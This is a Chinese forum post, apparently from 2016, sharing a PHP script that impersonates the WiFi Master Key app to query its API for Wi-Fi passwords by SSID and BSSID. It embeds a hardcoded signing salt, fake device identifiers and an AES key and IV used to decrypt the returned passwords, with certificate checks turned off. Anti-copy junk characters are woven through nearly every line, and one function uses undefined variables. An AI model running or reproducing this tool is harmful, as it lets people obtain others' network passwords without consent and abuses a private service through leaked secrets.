少尉
- 注册时间
- 2014-1-14
- 金币
- 289 个
- 威望
- 1 个
- 荣誉
- 0 个
累计签到:7 天
连续签到:0 天
[LV.20]漫游旅程
|
代码:
* j3 ~$ W- W: b' o<form action="" method="post">
$ |5 z7 ~4 o- b X7 } <p>ssid: <input type="text" name="ssid" /></p>
: i7 X0 Z# y* t- g' q. d' d# \9 Q <p>bssid: <input type="text" name="bssid" /></p>
7 w) @, |+ I% ?( |/ A- }2 I <input type="submit" value="提交" />* u0 U4 d9 _' k6 _& m, ~8 c% s6 ^
</form>/ w1 t# }* J+ u( U9 i" `
4 _1 @: g1 o0 q
<?php( Q- ]: d6 r0 H
$bssid = $_POST["bssid"] ;5 [* _, r [7 L6 L
$ssid = $_POST["ssid"] ;
9 [; k A# h; C9 Pif (isset( $bssid ) && isset( $ssid )){
% A9 s# y) t/ {: x//update salt
( K' @3 b( ?# t6 `, c8 T/ n $ret = request( $bssid , $ssid , md5(rand(1, 10000)));! d7 r& M" }& @* u/ Q4 ]
$ret = json_decode( $ret );
) g) x; N3 O0 N: e5 @- N N9 t3 J $ret = request( $bssid , $ssid , $ret ->retSn);
: G2 [0 }: y4 b! f# ]2 q& F $ret = json_decode( $ret );
( K' y' k) U% l) D6 L* T, X if ( $ret ->retCd == 0){
2 f" r# c' ~, ]( Y O if ( $ret ->qryapwd->retCd == 0){
. m9 A1 B6 h+ k $list = $ret ->qryapwd->psws;
6 Q m" K8 z/ Z. z foreach ( $list as $wifi ){
% {4 w! H7 E \! F2 B echo 'SSID: ' . $wifi ->ssid. "<br>" ;/ ^0 D; P$ u( [6 ~" X) [: }: K6 s q
echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;) e2 f$ D/ C6 e7 w: ^$ I% l; q4 D1 X
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;
8 x2 d z, d5 |* z8 W if ( $wifi ->xUser){
4 @) c- ~. y9 Z q! e v echo 'xUser: ' . $wifi ->xUser. "<br>" ;6 m& M- T+ O# R
echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;! L" \1 F+ c6 i9 A9 X5 ~0 E. A
}
, A1 [- i4 v0 O5 D) G, K) d }- R! h' J A" m% I
}
; M4 }1 {1 B; m0 |/ Z, b else {" F8 H! h- k2 ~) S6 Y
echo $ret ->qryapwd->retMsg; M8 S& V$ b/ p. s
}1 c2 v# j! U. ]$ ?# a2 w' c$ j" n/ K
}& ^9 k' U; V/ Y* I5 J
}
3 e. N, y1 t/ p. dfunction request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
- T5 L' O; K: F4 p Y2 J $data = array ();
1 T) b0 Z$ Z& V" ` $data [ 'appid' ] = '0008' ;
2 `9 G7 J: n- q# p$ z% r1 D $data [ 'bssid' ] = $bssid ;
/ ?: ~* \( v+ _( J# a $data [ 'chanid' ] = 'gw' ;: S( E' }# V- I3 y, [' s. G
$data [ 'dhid' ] = $dhid ;
% g) n% Z* v( g! u) C $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
! }# x3 m2 n6 x4 |* d $data [ 'lang' ] = 'cn' ;1 H; I: Q9 D- g
$data [ 'mac' ] = '60f81dad28dh' ;0 t! j, Z* `/ W1 N: ?% }
$data [ 'method' ] = 'getDeepSecChkSwitch' ;
% D$ q9 _% c8 _& t $data [ 'pid' ] = 'qryapwd:commonswitch' ;
: B+ ^1 d( L/ g2 @' P- R, ]1 u $data [ 'ssid' ] = $ssid ;; D( Q& a6 J3 o4 S# Z i* b
$data [ 'st' ] = 'm' ; v6 Z, U/ s+ T; r: J. `" e
$data [ 'uhid' ] = 'a0000000000000000000000000000002' ;
) G& G3 u( O/ E1 M/ s# h $data [ 'v' ] = '324' ;
3 v1 X. e6 w! O3 S $data [ 'sign' ] = sign( $data , $salt );/ W' D0 ?8 B1 v' |8 K1 K
$curl = curl_init();$ L# K9 M8 j1 W
curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );2 A( x5 s8 X0 u) z: t
curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
4 }( v' _& g: W, x& R8 q curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate* u5 v$ I5 F4 v8 G
curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
- `' H+ V7 a& d+ R9 V, c+ F8 c curl_setopt( $curl , CURLOPT_POST, true); // enable posting3 v9 K6 e2 k& X
curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images% I* G$ g" Z5 `. o$ O; [) v F
curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
a( S* i5 H! F( w $r = curl_exec( $curl );6 `$ I; O! Q2 S! Y
curl_close( $curl );4 d! R. w' n4 ^7 N
return $r ;( ?9 t0 ]5 T; G+ n$ {
}
0 X# S! y0 @# Z, y# q0 Ffunction registerNewDevice(){! @2 d* F+ ]- J
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;
& J' V \2 c5 X* e $data = array ();* M J2 D6 i7 F. {$ ]/ z1 F" M, x
$data [ 'appid' ] = '0008' ;/ c! c+ [7 R9 W/ _
$data [ 'bssid' ] = $bssid ;% _, j+ x+ i* ?) Q' h' m. a6 b
$data [ 'chanid' ] = 'gw' ;; _- i% ?6 O' Z% t& t
$data [ 'dhid' ] = $dhid ;; d6 v/ s0 u' E7 S2 p% b
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;, |+ o V h9 G* q
$data [ 'lang' ] = 'cn' ;
5 Y0 q1 {& \4 {" r* f6 }' w, X $data [ 'mac' ] = '60f81dad28de' ;
. ]; a" f2 J6 s8 e $data [ 'method' ] = 'getDeepSecChkSwitch' ;
0 ^' c4 C7 T* S2 J! [% m9 L* m1 _" } $data [ 'pid' ] = 'qryapwd:commonswitch' ;
" u9 ?8 E( t: u $data [ 'ssid' ] = $ssid ;
/ r6 O1 _; m- a5 x1 [- F $data [ 'st' ] = 'm' ;1 D4 m6 B/ B, ~4 W8 b( A/ A
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
) j3 K: {" b! [7 f: o $data [ 'v' ] = '324' ;
8 [; e g& k: V7 F+ `0 r $data [ 'sign' ] = sign( $data , $salt );. t% [6 ]6 J* _
}) m+ z' w3 l5 F) Q
function sign( $array , $salt ){
/ x$ p; ?) a3 R% T // 签名算法( c* h0 R4 t6 n, Z( r( r1 N
$request_str = '' ;; p- m: v9 h7 x$ g
// 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
$ g( r8 s- W6 E: k0 c8 o ksort( $array );0 ^: _; h6 B& l- F
foreach ( $array as $key => $value ) {
/ H- y2 k3 O) x1 `) z2 q( |' a $request_str .= $value ;9 Z3 r4 p( m3 t8 d p5 a
}
/ K0 S3 u$ q# ?# y- E+ p* u1 N; W, y $sign = md5( $request_str . $salt );
2 M! z$ {0 S0 r return strtoupper ( $sign );5 Y% M" s, N& s b
}
3 P! v1 e- ~) ?# T: `& \function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
2 i8 Z0 {8 I/ x9 J% O/ o! c% t //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密- b8 g2 I' `/ ~9 d( M* R U
//[length][password][timestamp] K9 l4 V* v; v, _. f |8 `
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );3 a9 k7 m* y' x( k! T7 c
return substr (trim( $decrypted_string ),3,-13);% D0 O" p# Y7 g- C' ? U% O/ B; [
} ?>可惜每天限制了查询次数!
& i' a. j' g5 ]' J9 U截图:$ \. I3 u' H- p+ ^9 G
% S9 t: h0 r! z$ I
我的博客:www.bluexiang.com! F- D$ M2 W) G" F& [2 d
! f: F% a' }4 a' G% j6 |& ~6 B6 O
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
2
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-21 13:51
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
